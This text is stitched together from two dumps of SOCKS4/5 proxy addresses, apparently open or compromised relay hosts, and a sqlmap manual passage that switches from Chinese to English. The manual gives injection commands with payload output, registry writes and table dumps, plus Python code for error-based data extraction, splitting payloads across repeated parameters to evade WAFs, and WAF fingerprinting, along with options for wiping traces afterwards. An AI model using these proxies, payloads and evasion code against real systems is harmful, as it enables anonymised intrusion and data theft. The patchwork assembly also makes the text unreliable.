72.34.180.129:1080@SOCKS4 $1sec#United States
75.131.195.75:34551@SOCKS4 $1sec#United States
75.131.195.75:34551@SOCKS5 $1sec#United States
96.236.25.161:16379@SOCKS4 $1sec#United States
96.252.102.45:31090@SOCKS5 $1sec#United States
97.95.225.218:1995@SOCKS4 $1sec#United States
97.95.225.218:1995@SOCKS5 $1sec#United States
98.251.255.28:5110@SOCKS5 $1sec#United States
173.234.116.197:23537@SOCKS5 $2sec#United States
24.146.175.103:28281@SOCKS5 $2sec#United States
24.181.161.105:42701@SOCKS5 $2sec#United States
24.217.83.234:23090@SOCKS5 $2sec#United States
64.121.194.193:48597@SOCKS4 $2sec#United States
67.187.175.216:26694@SOCKS5 $2sec#United States
70.118.47.109:31639@SOCKS4 $2sec#United States
70.118.47.109:31639@SOCKS5 $2sec#United States
70.119.47.206:22339@SOCKS5 $2sec#United States
70.177.213.17:11838@SOCKS5 $2sec#United States
71.168.187.38:22063@SOCKS5 $2sec#United States
71.198.249.7:50101@SOCKS4 $2sec#United States
71.198.249.7:50101@SOCKS5 $2sec#United States
71.81.137.163:14079@SOCKS5 $2sec#United States
71.93.73.104:42192@SOCKS4 $2sec#United States
75.133.147.135:2663@SOCKS5 $2sec#United States
76.110.43.4:8865@SOCKS4 $2sec#United States
76.110.43.4:8865@SOCKS5 $2sec#United States
98.211.28.229:50583@SOCKS5 $2sec#United States
199.231.185.99:1080@SOCKS4 $3sec#United States
24.1.151.81:22039@SOCKS5 $3sec#United States
65.31.134.137:42989@SOCKS5 $3sec#United States
65.70.243.69:6897@SOCKS4 $3sec#United States
65.70.243.69:6897@SOCKS5 $3sec#United States
66.196.209.90:10827@SOCKS5 $3sec#United States
66.23.230.230:1080@SOCKS4 $3sec#United States
67.187.175.216:26694@SOCKS4 $3sec#United States
69.4.193.154:23195@SOCKS5 $3sec#United States
69.81.146.157:30841@SOCKS4 $3sec#United States
74.193.170.210:5439@SOCKS5 $3sec#United States
98.251.255.28:17045@SOCKS4 $3sec#United States
24.183.232.214:3988@SOCKS5 $4sec#United States
75.128.223.139:29331@SOCKS5 $4sec#United States
173.230.140.74:10080@SOCKS5 $5sec#United States
174.60.216.175:10661@SOCKS5 $5sec#United States
67.60.187.127:42527@SOCKS4 $5sec#United States
69.4.193.154:23195@SOCKS4 $5sec#United States
98.207.244.241:6952@SOCKS4 $5sec#United States
142.91.217.204:23537@SOCKS5 $5sec#UNITED STATES
174.70.170.55:58278@SOCKS5 $5sec#United States
74.60.252.144:43254@SOCKS4 $5sec#United States
75.128.223.139:29331@SOCKS4 $5sec#United States
24.6.250.152:48615@SOCKS5 $5sec#United States
71.248.115.141:27742@SOCKS4 $5sec#United States
199.231.185.120:1080@SOCKS4 $5sec#United States
70.63.156.238:1080@SOCKS4 $5sec#United States
71.194.61.194:7415@SOCKS4 $5sec#United States
24.182.136.146:1080@SOCKS4 $5sec#United States
65.110.39.30:10080@SOCKS5 $5sec#United States
67.167.235.7:4781@SOCKS4 $5sec#United States
68.82.127.39:34793@SOCKS4 $5sec#United States
98.206.20.81:16285@SOCKS5 $5sec#United States
199.168.138.244:1080@SOCKS5 $5sec#United States
108.62.75.248:61249@SOCKS5 $5sec#United States
67.215.209.227:35853@SOCKS4 $5sec#United States
98.206.20.81:16285@SOCKS4 $5sec#United States
#-------->End of Socks4/5<--------------

10-08-13 | Socks 5 Yahoo Voice

Socks5:

101.44.3.50:1080
103.8.74.234:1080
108.32.48.105:43851
108.62.75.247:61249
108.62.75.248:61249
109.108.76.102:1080
109.86.64.240:13998
109.86.64.240:46922
110.139.15.63:1080
110.74.218.227:1080
111.93.6.198:1080
112.78.139.130:1080
117.218.50.225:1080
118.114.77.116:10086
121.22.127.17:1080
121.52.45.62:1080
122.225.36.101:1080
123.103.98.92:10080
123.201.114.153:1080
123.231.255.203:1080
123.234.230.45:1080
124.208.83.6:39289
141.255.161.74:1080
142.91.217.204:23537
146.115.61.107:1328
147.255.183.227:61249
147.255.183.230:61249
151.230.90.80:54929
162.105.25.123:1080
173.20.134.21:17051
173.230.140.74:10080
173.234.116.197:23537
173.234.116.203:23537
173.234.12.236:61249
173.68.77.144:1508
173.70.24.198:5065
173.71.223.105:43229
174.142.75.243:443
174.60.216.175:10661
174.70.170.55:58278
176.111.191.53:1080
177.107.75.2:1080
177.155.240.10:1080
180.211.179.30:1080
187.111.221.162:1080
188.128.99.94:1
188.241.27.148:42859
188.241.27.148:58401
189.42.17.189:1080
190.107.140.74:1080
190.107.140.76:1080
190.128.238.26:10080
190.147.36.33:1080
190.81.196.71:1080
192.151.155.180:1080
192.241.234.49:1080
192.241.234.49:27977
192.64.8.6:443
192.69.200.124:1080
194.126.140.247:1080
198.143.190.94:1080
199.168.138.244:1080
2.188.16.12:443
200.215.14.62:1080
201.147.145.146:1080
202.103.241.169:1080
202.109.133.181:1080
202.115.11.4:1080
202.120.7.122:1080
202.137.22.200:1080
202.169.236.193:1080
202.169.236.194:1080
202.169.236.195:1080
202.169.236.199:1080
202.38.95.66:1080
207.182.142.244:443
208.84.134.254:1080
209.190.35.251:1080
210.22.151.78:1080
210.23.68.7:10080
210.45.117.249:1080
210.51.44.199:1080
211.119.86.224:1080
212.57.179.193:2214
212.57.179.29:2214
212.66.60.28:1080
212.75.130.37:1080
213.111.67.82:1080
213.199.248.28:1080
213.199.248.29:1080
213.199.248.30:1080
213.199.248.31:1080
213.199.248.32:1080
213.199.248.35:1080
216.244.78.227:1080
216.244.80.153:2500
216.36.168.61:45427
218.202.183.250:1080
219.147.172.2:12345
219.223.252.183:1080
220.191.245.214:6002
221.132.35.5:2214
222.174.54.164:1080
222.188.10.1:1080
222.218.142.49:33
222.240.175.79:8580
222.90.206.134:1080
23.19.102.197:61249
24.1.151.81:22039
24.128.18.205:22445
24.146.175.103:28281
24.181.161.105:42701
24.183.232.214:3988
24.184.40.65:2547
24.217.83.234:23090
24.226.197.30:13341
24.35.162.182:1508
24.35.162.182:26074
24.6.250.152:32493
24.6.250.152:48615
24.63.202.92:39179
31.3.237.247:443
41.211.125.123:1080
41.42.241.5:1080
41.46.205.106:1080
41.84.135.33:1080
46.241.57.188:1080
49.212.58.108:10080
5.102.156.25:1080
5.228.104.45:1080
5.9.212.53:5797
58.20.0.240:1080
58.20.0.247:1080
58.213.157.68:1080
60.190.43.10:1080
60.214.223.178:1080
61.136.68.76:1080
61.163.37.76:1080
61.166.55.153:11110
62.64.79.120:443
64.194.160.2:7225
65.110.39.30:10080
65.31.134.137:42989
65.70.243.69:6897
66.168.170.55:53020
66.196.209.90:10827
66.214.101.189:1574
66.23.230.232:1080
67.187.175.216:26694
67.215.209.227:35853
67.60.187.127:42527
67.8.252.3:25567
68.188.241.29:5031
68.71.60.150:443
68.83.9.51:27557
68.96.1.118:64815
69.139.85.38:1727
69.143.1.46:54917
69.143.1.46:55259
69.15.234.90:1897
69.4.193.154:23195
69.81.146.157:30841
70.118.47.109:31639
70.119.47.206:22339
70.119.47.206:40677
70.177.213.17:11838
71.168.187.38:22063
71.194.61.194:7415
71.198.249.7:50101
71.61.141.239:33619
71.81.137.163:14079
71.93.73.104:42192
74.193.170.210:5439
75.128.223.139:29331
75.131.195.75:34551
75.133.147.135:2663
75.183.116.142:28055
76.103.102.195:37409
76.110.43.4:8865
78.25.77.206:1080
81.19.35.170:1080
82.114.79.254:1080
85.214.148.228:60006
85.68.234.87:42219
87.120.52.138:6081
88.150.193.144:6666
88.150.215.146:1080
88.150.215.169:1080
89.203.137.145:1080
89.203.137.193:1080
89.203.137.93:1080
91.121.79.98:40018
92.247.60.5:1080
92.255.235.215:1080
92.51.109.182:1080
93.103.201.98:3444
93.184.71.66:1080
93.184.71.87:1080
93.99.147.1:1080
94.248.250.78:24606
94.75.207.145:65233
95.141.35.136:1080
96.236.25.161:16379
96.252.102.45:31090
97.95.225.218:1995
97.95.225.218:32863
98.206.20.81:16285
98.207.244.241:6952
98.211.28.229:50583
98.251.255.28:17045
98.251.255.28:5110

sqlmap用户手册[续]

《sqlmap用户手册》其实只写了大部分可能用到的参数,还有些并未写,这次补上~ 顺便注:文中部分是– 而不是—— (这个不是我不愿意修改,而是网站系统的问题,实在抱歉,请大家在复制语句之后手工修改。:) )

ps:其实看到zone里很多问sqlmap的问题在通读看完那篇文章后都能解决。可惜啊,现在的人通读看文章的耐心都没有了,遇到了哪个问题就想起针对这个问题求助,却不知道仔细看完之后,以后可以省多少时间来求助,吐槽完毕,正文开始:

对Windows注册表操作
当数据库为MySQL,PostgreSQL或Microsoft SQL Server,并且当前web应用支持堆查询。 当然,当前连接数据库的用户也需要有权限操作注册表。

读取注册表值
参数:–reg-read

写入注册表值
参数:–reg-add

删除注册表值
参数:–reg-del

注册表辅助选项
参数:–reg-key,–reg-value,–reg-data,–reg-type

需要配合之前三个参数使用,例子:

1
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 –reg-add –reg-key=”HKEY_LOCAL_MACHINESOFTWAREsqlmap” –reg-value=Test –reg-type=REG_SZ –reg-data=1

常规参数
从sqlite中读取session
参数:-s

sqlmap对每一个目标都会在output路径下自动生成一个SQLite文件,如果用户想指定读取的文件路径,就可以用这个参数。

保存HTTP(S)日志
参数:-t

这个参数需要跟一个文本文件,sqlmap会把HTTP(S)请求与响应的日志保存到那里。

非交互模式
参数:–batch

用此参数,不需要用户输入,将会使用sqlmap提示的默认值一直运行下去。

强制使用字符编码
参数:–charset

不使用sqlmap自动识别的(如HTTP头中的Content-Type)字符编码,强制指定字符编码如:

–charset=GBK
爬行网站URL
参数:–crawl

sqlmap可以收集潜在的可能存在漏洞的连接,后面跟的参数是爬行的深度。

例子:

1
$ python sqlmap.py -u “http://192.168.21.128/sqlmap/mysql/” –batch –crawl=3
2
[...]
3
[xx:xx:53] [INFO] starting crawler
4
[xx:xx:53] [INFO] searching for links with depth 1
5
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
6
[xx:xx:53] [INFO] searching for links with depth 2
7
[xx:xx:54] [INFO] heuristics detected web page charset ‘ascii’
8
[xx:xx:00] [INFO] 42/56 links visited (75%)
9
[...]

规定输出到CSV中的分隔符
参数:–csv-del

当dump保存为CSV格式时(–dump-format=CSV),需要一个分隔符默认是逗号,用户也可以改为别的 如:

1
–csv-del=”;”

DBMS身份验证
参数:–dbms-cred

某些时候当前用户的权限不够,做某些操作会失败,如果知道高权限用户的密码,可以使用此参数,有的数据库有专门的运行机制,可以切换用户如Microsoft SQL Server的OPENROWSET函数

定义dump数据的格式
参数:–dump-format

输出的格式可定义为:CSV,HTML,SQLITE

预估完成时间
参数:–eta

可以计算注入数据的剩余时间。

例如Oracle的布尔型盲注:

1
$ python sqlmap.py -u “http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1″ -b –eta
2

3
[...]
4
[hh:mm:01] [INFO] the back-end DBMS is Oracle
5
[hh:mm:01] [INFO] fetching banner
6
[hh:mm:01] [INFO] retrieving the length of query output
7
[hh:mm:01] [INFO] retrieved: 64
8
17% [========> ] 11/64 ETA 00:19

然后:

1
100% [===================================================] 64/64
2
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 – Prod
3

4
web application technology: PHP 5.2.6, Apache 2.2.9
5
back-end DBMS: Oracle
6
banner: ‘Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 – Prod’

sqlmap先输出长度,预计完成时间,显示百分比,输出字符

刷新session文件
参数:–flush-session

如果不想用之前缓存这个目标的session文件,可以使用这个参数。 会清空之前的session,重新测试该目标。

自动获取form表单测试
参数:–forms

如果你想对一个页面的form表单中的参数测试,可以使用-r参数读取请求文件,或者通过–data参数测试。 但是当使用–forms参数时,sqlmap会自动从-u中的url获取页面中的表单进行测试。

忽略在会话文件中存储的查询结果
参数:–fresh-queries

忽略session文件保存的查询,重新查询。

使用DBMS的hex函数
参数:–hex

有时候字符编码的问题,可能导致数据丢失,可以使用hex函数来避免:

针对PostgreSQL例子:

1
$ python sqlmap.py -u “http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1″ –banner –hex -v 3 –parse-errors
2

3
[...]
4
[xx:xx:14] [INFO] fetching banner
5
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
6
[xx:xx:15] [INFO] parsed error message: ‘pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for type numeric: “:vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:” in /var/www/sqlmap/libs/pgsql.inc.php on line 35
7
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
8
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
9
[...]

自定义输出的路径
参数:–output-dir

sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:–output-dir=/tmp

Parse DBMS error messages from responses
Option: --parse-errors

If the target application does not suppress DBMS errors, a failing query returns the database's error text in the response. With this option sqlmap parses and displays those messages; they help when debugging an injection and, as below, can reveal details such as the number of columns in the query.

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
/sqlmap/mssql/iis/get_int.asp, line 27'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
/sqlmap/mssql/iis/get_int.asp, line 27'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
/sqlmap/mssql/iis/get_int.asp, line 27'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
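The client-side half of --parse-errors and --hex, as an added example that is not sqlmap's own code: pull the DBMS error text out of an HTTP response body with a few driver-specific patterns, then recover the value sqlmap wrapped between its two random markers and, when the DBMS was asked to hex-encode it, decode the hex back into UTF-8. The patterns are a small illustrative subset of sqlmap's error knowledge base, and the two response bodies are constructed for this example (the PostgreSQL one carries a non-ASCII value to show why hex encoding matters).

```python
"""
Added example (not sqlmap's own code) of what --parse-errors and --hex do on the
client side.  sqlmap wraps the value it wants between two random marker strings
(':vtj:' ... ':nxb:' in the PostgreSQL run above), forces a type error so the DBMS
echoes the value back in its error message, and with --hex has the DBMS hex-encode
the value first so non-ASCII bytes survive the application and the error text.
"""
import binascii
import html
import re

# Illustrative error-message patterns (a tiny subset of what sqlmap recognizes);
# the named group 'msg' captures the DBMS text up to the next tag or line break.
ERROR_PATTERNS = {
    "Microsoft SQL Server": re.compile(
        r"Microsoft OLE DB Provider for ODBC Drivers.*?\[SQL Server\](?P<msg>[^<\r\n]+)", re.S),
    "PostgreSQL": re.compile(
        r"pg_query\(\)[^:\r\n]*: Query failed: (?P<msg>ERROR:[^<\r\n]+)"),
    "MySQL": re.compile(
        r"(?P<msg>You have an error in your SQL syntax[^<\r\n]*)"),
}


def parse_errors(page):
    """Return [(dbms, message)] for every DBMS error found in an HTTP response body."""
    text = html.unescape(page)          # &quot; etc. appear in HTML-rendered errors
    found = []
    for dbms, pattern in ERROR_PATTERNS.items():
        for match in pattern.finditer(text):
            found.append((dbms, match.group("msg").strip()))
    return found


def extract_marked_value(message, prefix, suffix, hex_encoded=False):
    """
    Pull the value between sqlmap's two marker strings out of an error message.
    With --hex the DBMS sent it hex-encoded (PostgreSQL: encode(convert_to(v,'UTF8'),'hex')),
    so undo that and decode as UTF-8, the charset the payload asked for.
    """
    match = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), message, re.S)
    if not match:
        return None
    raw = match.group(1)
    return binascii.unhexlify(raw).decode("utf-8") if hex_encoded else raw


def retrieve_banner(page, prefix=":vtj:", suffix=":nxb:"):
    """End-to-end: find the DBMS error, then decode the hex value between the markers."""
    for dbms, msg in parse_errors(page):
        value = extract_marked_value(msg, prefix, suffix, hex_encoded=True)
        if value is not None:
            return dbms, value
    return None


# Constructed responses for this example (not captured from a real target).
# The hex decodes to "PostgreSQL 8.3.9 (数据库)" - a value that would be mangled
# by a Latin-1 page if it were not hex-encoded on the DBMS side.
PG_PAGE = (
    "<b>Warning</b>: pg_query() [function.pg-query]: Query failed: ERROR: "
    "invalid input syntax for type numeric: &quot;:vtj:"
    "506f737467726553514c20382e332e392028e695b0e68daee5ba9329:nxb:&quot; "
    "in /var/www/sqlmap/libs/pgsql.inc.php on line 35"
)
MSSQL_PAGE = (
    "<font face=\"Arial\" size=2><p>Microsoft OLE DB Provider for ODBC Drivers</font> "
    "<font face=\"Arial\" size=2>error '80040e14'</font><p>"
    "<font face=\"Arial\" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]"
    "The ORDER BY position number 10 is out of range of the number of items in the select list.</font><p>"
    "<font face=\"Arial\" size=2>/sqlmap/mssql/iis/get_int.asp</font>"
    "<font face=\"Arial\" size=2>, line 27</font>"
)

if __name__ == "__main__":
    print(parse_errors(MSSQL_PAGE))
    print(retrieve_banner(PG_PAGE))
```

The same marker-extraction step applies to error-based payloads without --hex (for example the MSSQL "Conversion failed when converting the varchar value ':abc:1:def:'" form): only the hex-decode is skipped.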

Miscellaneous options
Use option abbreviations
Option: -z

When a command line gets long and unwieldy, -z takes a comma-separated list of abbreviated option names: each item is a prefix of a long option name that identifies it uniquely, with =value appended where the option takes a value. For example:

python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

can be written as:

python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

Likewise:

python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

can be written as (note that this abbreviated form also adds bat, i.e. --batch):

python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

Run a command when SQL injection is found
Option: --alert

Runs the given host OS command whenever sqlmap finds an SQL injection, for example to send a notification during a long batch run.

Pre-set answers to prompts
Option: --answers

When sqlmap would ask a question interactively, this option supplies the answer in advance as question-substring=answer pairs (several can be separated by commas); it is typically combined with --batch. Example:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
[...]

Beep when SQL injection is found
Option: --beep

Emits a beep when an SQL injection is found.

Heuristically detect WAF/IPS/IDS protection
Option: --check-waf

WAF/IPS/IDS devices can interfere badly with sqlmap's tests. If you suspect the target sits behind one, this option runs a quick check: sqlmap repeats the request with an extra, non-existent parameter carrying an obviously malicious value, for example:

&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1

A protected target typically answers this probe differently from the original request (a block page, a 403, a dropped connection). Note that later sqlmap releases removed --check-waf, and later --identify-waf as well: on current versions this detection runs automatically as part of the heuristic checks.

Clean up sqlmap's UDFs and tables
Option: --cleanup

Removes the user-defined functions and temporary tables that sqlmap itself created in the DBMS during an earlier run (the --os-* takeover features need them). Run it at the end of an engagement so no tooling is left behind on the target.

Disable colored output
Option: --disable-coloring

sqlmap colors its console output by default; this option turns that off, which is useful when the output is redirected to a file.

Use a specific Google result page
Option: --gpage

By default, with -g, sqlmap takes the first 100 URLs returned for the Google dork as its targets; this option selects a different result page number.

Use HTTP parameter pollution
Option: --hpp

HTTP parameter pollution (sending the same parameter several times so the payload is split across the copies) can bypass WAF/IPS/IDS inspection. It is especially effective against ASP/IIS and ASP.NET/IIS, which concatenate the values of a repeated parameter.
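The mechanism behind --hpp, as an added example that is not sqlmap's own implementation: classic ASP and ASP.NET on IIS join the values of a repeated query parameter with ", ", so a payload can be split at its commas over several copies of the parameter and the application reassembles the original statement, while a filter that examines each value on its own never sees the comma-separated column list. asp_join() is a constructed stand-in for that server-side behaviour and toy_filter_blocks() is a deliberately simplistic signature, not a real WAF rule.

```python
"""
Added example (not sqlmap's --hpp code) of HTTP parameter pollution against
ASP/IIS-style parameter handling.
"""
import re
from urllib.parse import parse_qsl, urlencode


def pollute(query, param, payload):
    """Rewrite a query string so `param` carries `payload` split at commas over repeated copies."""
    pairs = [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if k != param]
    pairs += [(param, piece.strip()) for piece in payload.split(",")]
    return urlencode(pairs)


def asp_join(query):
    """Constructed stand-in for ASP/IIS Request.QueryString: repeated values are joined with ', '."""
    merged = {}
    for k, v in parse_qsl(query, keep_blank_values=True):
        merged.setdefault(k, []).append(v)
    return {k: ", ".join(vs) for k, vs in merged.items()}


# Toy per-value signature: blocks "UNION [ALL] SELECT a,b,..." only when the column
# list (with its commas) is visible inside a single parameter value.
_UNION_WITH_COLUMNS = re.compile(r"union\s+(all\s+)?select\s+[^&]*,", re.I)


def toy_filter_blocks(query):
    return any(_UNION_WITH_COLUMNS.search(v) is not None
               for _, v in parse_qsl(query, keep_blank_values=True))


if __name__ == "__main__":
    original = "id=1 UNION ALL SELECT 1,2,3"
    polluted = pollute("id=1&page=2", "id", "1 UNION ALL SELECT 1,2,3")
    print(polluted)                        # id repeated three times
    print(asp_join(polluted)["id"])        # server sees the whole statement again
    print(toy_filter_blocks(original), toy_filter_blocks(polluted))
```

Whether this works in practice depends on the platform's join behaviour (PHP, for instance, keeps only the last value of a repeated parameter) and on whether the inspection layer normalizes repeated parameters the same way the backend does; that mismatch is the whole basis of the technique.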

Identify WAF/IPS/IDS protection
Option: --identify-waf

sqlmap can try to identify the specific WAF/IPS/IDS product in front of the target so that a suitable bypass (typically --tamper scripts) can be chosen. At the time of writing about 30 products are recognized.

Example against a MySQL target protected by ModSecurity:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
[...]
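The two checks described under --check-waf and --identify-waf, as an added example that is not sqlmap's own waf/ scripts: the heuristic compares the response to a normal request with the response to the same request plus a junk parameter carrying the obviously malicious value quoted above, and the fingerprinting step looks for product signatures in the status code, headers, cookies and body. Both functions work on already-captured responses (plain dicts) so the example runs offline; the three fingerprints are well-known public ones, and the responses, header values and fetch function are constructed for this example.

```python
"""
Added example (not sqlmap's code): a --check-waf style heuristic plus a few
--identify-waf style fingerprints, applied to captured HTTP responses.
"""
import difflib
import re
from urllib.parse import urlencode

# The junk parameter value --check-waf appends (taken from the text above).
PROBE_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1"


def build_probe_url(url, param="foobar"):
    """Append a non-existent parameter carrying the obviously malicious value."""
    return url + ("&" if "?" in url else "?") + urlencode({param: PROBE_PAYLOAD})


def looks_protected(normal, probe, threshold=0.98):
    """Heuristic: a blocked probe changes the status code or the page body markedly."""
    if normal["code"] != probe["code"]:
        return True
    ratio = difflib.SequenceMatcher(None, normal["body"], probe["body"]).ratio()
    return ratio < threshold


def check_waf(fetch, url):
    """Fetch the URL normally and with the probe parameter, then compare the two responses."""
    return looks_protected(fetch(url), fetch(build_probe_url(url)))


# Fingerprints (public, well-known ones; sqlmap ships one script per product).
def _modsecurity(r):
    return (re.search(r"Mod_Security|NOYB", r["headers"].get("server", ""), re.I) is not None
            or "this error was generated by mod_security" in r["body"].lower())


def _cloudflare(r):
    return ("cloudflare" in r["headers"].get("server", "").lower()
            or "cf-ray" in r["headers"]
            or any(c.startswith("__cfduid=") for c in r["cookies"]))


def _incapsula(r):
    return (any(c.startswith(("incap_ses_", "visid_incap_")) for c in r["cookies"])
            or "_Incapsula_Resource" in r["body"])


FINGERPRINTS = [
    ("ModSecurity (Trustwave)", _modsecurity),
    ("Cloudflare", _cloudflare),
    ("Incapsula (Imperva)", _incapsula),
]


def identify_waf(response):
    """Return the names of every product whose fingerprint matches the response."""
    r = {
        "code": response.get("code", 200),
        "headers": {k.lower(): v for k, v in response.get("headers", {}).items()},
        "cookies": response.get("cookies", []),
        "body": response.get("body", ""),
    }
    return [name for name, test in FINGERPRINTS if test(r)]


# Constructed responses (not captured from real servers).
NORMAL = {"code": 200, "headers": {"Server": "Apache/2.2.22"}, "cookies": [],
          "body": "<html><body><h1>Item 1</h1><p>price 10</p></body></html>"}
MODSEC_BLOCK = {"code": 403, "headers": {"Server": "Apache/2.2.22"}, "cookies": [],
                "body": "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1>"
                        "<p>You don't have permission to access /sqlmap/mysql/get_int.php on this server.</p>"
                        "<p>This error was generated by Mod_Security.</p></body></html>"}
CF_BLOCK = {"code": 403, "headers": {"Server": "cloudflare", "CF-RAY": "0000000000000000-EXAMPLE"},
            "cookies": ["__cfduid=example"],
            "body": "<html><head><title>Attention Required! | Cloudflare</title></head></html>"}


def fake_fetch(url):
    """Constructed stand-in for a target behind ModSecurity: the probe parameter gets blocked."""
    return MODSEC_BLOCK if "foobar=" in url else NORMAL


if __name__ == "__main__":
    target = "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1"
    print(build_probe_url(target))
    print(check_waf(fake_fetch, target), identify_waf(MODSEC_BLOCK), identify_waf(CF_BLOCK))
```

The heuristic only says that something reacts to attack-like input, not what; that is why it is paired with fingerprinting. Keep in mind that a dynamic page can fall below the similarity threshold on its own, so a positive heuristic result should be confirmed with a second benign request before blaming a WAF.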

Imitate a smartphone
Option: --mobile

Some servers only accept requests from mobile clients; this option makes sqlmap send a smartphone User-Agent header instead of its default one. Example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]

Securely delete the output directory
Option: --purge-output

When result files must be removed beyond recovery, this option wipes sqlmap's output directory: every file is overwritten with random data, truncated, renamed to a random name and only then deleted (newer sqlmap versions call this option --purge). Example:

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
